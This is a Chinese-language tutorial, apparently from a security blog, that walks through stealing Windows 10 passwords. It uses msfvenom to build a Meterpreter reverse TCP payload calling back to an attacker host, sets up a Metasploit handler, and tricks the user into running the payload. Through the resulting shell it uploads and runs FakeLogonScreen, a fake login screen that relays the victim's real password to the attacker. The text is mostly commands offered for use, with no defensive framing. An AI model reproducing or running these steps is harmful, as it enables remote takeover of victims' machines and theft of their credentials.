在前面的文章中，我们讲到了利用mimikatz和kiwi获取Windows明文密码的方式。但是这种方法只能对win7系统有效。在高版本的Windows10及11中，这种方法已无效！本文将介绍利用FakeLogonScreen和破解 Windows 10 密码。

?关于FakelogonScreen

FakelogonScreen 是一个钓鱼工具，可在目标 Windows 10 机器的屏幕上创建虚假登录页面。当受害者输入密码后，会将密码传递给攻击者。和其他钓鱼工具不同的是，只有用户输入了正确的密码，才能进入系统。

?攻击思路

利用msf生成shell,诱导用户点击后得到相应的shell。然后再上传FakelogonScreen 文件。当文件运行后，便可以诱导用户输入密码了。

接下来，我们下载 FakeLogonScreen文件：项目地址：

https://github.com/bitsadmin/fakelogonscreen/releases。

然后利用msf生成shell

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.50.123 lport=4444 -f exe >> payload.exe

接下来配置msf终端

use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.50.123
set lport 4444
run

当目标运行shell后，我们成功得到回弹。接着将我们之前下载的 FakeLogonScreen文件，进行上传到目标主机。

upload /root/Downloads/FakeLogonScreen.exe

完成后，访问 shell 并运行 FakeLogonScreen.exe

此时在目标计算机上，所有正在运行的窗口都将关闭，并且会出现一个登录屏幕，要求提供凭据。

为了测试这个工具的可靠性，我们输入错误的密码。它会显示密码错误，请重试错误。这是 FakeLogonScreen 工具的强大之处，它强制目标输入正确的密码。用户别无选择，只能输入正确的密码。

​需要注意的是，FakeLogonScreen与msf的配合是比较好的，输入的密码信息我们在msf的终端中可以直接看到！